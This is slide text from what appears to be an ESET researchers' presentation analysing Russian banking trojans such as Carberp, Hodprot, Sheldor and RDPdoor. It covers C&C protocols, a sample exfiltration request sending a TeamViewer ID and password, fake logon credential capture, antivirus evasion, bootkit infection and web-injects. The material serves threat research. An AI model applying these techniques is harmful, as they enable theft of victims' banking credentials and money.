2. Who we are?
Malware researchers at ESET
- complex threats analysis
- development of cleaning tools
- tracking new malware techniques
- investigation of cybercrime groups
http://www.joineset.com/
3. Agenda
o Cybercrime trends in RBS
o Most prevalent threats and incidents
Win32/Shiz
Win32/Hodprot
Win32/Sheldor
Win32/RDPdoor
Win32/Carberp
o Carberp cybercrime group revenue
4. Overview
2010/11: years of attacks on Russian banks
• number of incidents has more than doubled compared to 2010*
Over 92%* of incidents involve banking trojans
Malware tailored to Russian banks and payment
systems
However!
• Can (and IS) used in other countries as well
*research report "The Russian cybercrime market in 2010: status and trends”
http://www.group-ib.ru/wp-content/uploads/2011/04/Group-IB_Report_Russian-cybercrime-market_2010_eng.pdf
23. Win32/Hodprot: C&C protocol
Win32/Hodprot C&C Server
Send request
(bot ID, integer)
Reply with updated Handle
modules and image to Request
execute
Update the bot’s
modules, run
downloaded Send Status
exeutable Information
25. Win32/Sheldor and TeamViewer in action
1. Request cloud ID
2. Set cloud ID
3. Send ID to C&C TeamViewer
4. Malicious connection cloud
1 2
infected
4
computer
Win32/Sheldor
3
GET C&C
/getinfo.php?id=414%20034%20883&pwd
=6655&stat=1
26. Under the hood: DLL hooking
TeamViewer.exe
TV.dll
(proxy DLL)
TS.dll
(original TS.dll)
30. Win32/RDPdoor installation
infected Win32/RDPdoor
computer C&C
run dropper and send system information
1
authentication on C&C and provide Thinsoft BeTwin for installation
2
send status information
3
31. Stealing authentication data
1. Install GINA extension DLL
2. Display fake logon screen
3. Capture user name &
password
4. Send to C&C
35. Self-protecting Functionality
Bypassing AV-emulators many calls of rare WinAPI functions
Code injection method ZwQueueApcThread()
ZwResumeThread()
Unhooking method checking first bytes of API function
body and deleting hooks
Command and string encryption custom encryption algorithm
Bot authentication on C&C file with authentication data stored on
infected PC
Network communication encryption base64( RC2(data) )
API function calls obfuscation custom hash algorithm
Detection of AV hooks comparison of the first original bytes
Bypassing static AV signatures appending random junk bytes to
dropped files
Hiding in the system hooking system functions
bootkit infector (September 2011)
38. Carberp going deeper since September 2011
real mode
Load MBR
real mode
Load VBR
real mode/
Load protected mode
bootstrap
code
real mode/
protected mode
Load
bootmgr
Target of
Rovnix & Carberp
real mode/
Load protected mode
winload.exe or
winresume.exe
Load kernel
and boot
start drivers
39. Carberp: Infected Partition Layout
o Carberp overwrites bootstrap code of the active
partition
o The malicious driver is written either:
before active partition, in case there is enough space
in the end of the hard drive, otherwise
MBR VBR Bootstrap Code File System Data
Before Infecting
Compressed After Infecting
Data
Malicious
Malicious Bootstrap
MBR VBR File System Data Unsigned
Code Code
Driver
NTFS bootstrap code
(15 sectors)
43. Win32/Carberp: money stealing methods
Stealing techniques Functionality
Web-injects/Autoloads inserting the specified JS-code into HTML
(IE, FF, Chrome, Opera) returned by the online banking site
Backconnect backdoor loading on request special binary module
(RDP/VNC) (RDPdoor, custom VNC client)
Keylogger (based on WinAPI) recording keyboard events into logfile
ScreenSpy (based on WinAPI) saving screenshots into logfile
Grabbers (Form, FTP, Pass) loading on request special binary module
Custom plugins for RBS binary modules for specified RBS (sber.plug)
52. References
“Cybercrime in Russia: Trends and issues”
http://go.eset.com/us/resources/white-papers/CARO_2011.pdf
“Evolution of Win32/Carberp: going deeper”
http://blog.eset.com/2011/11/21/evolution-of-win32carberp-going-deeper
“Hodprot: Hot to Bot”
http://go.eset.com/us/resources/white-papers/Hodprot-Report.pdf
Follow ESET Threat Blog
http://blog.eset.com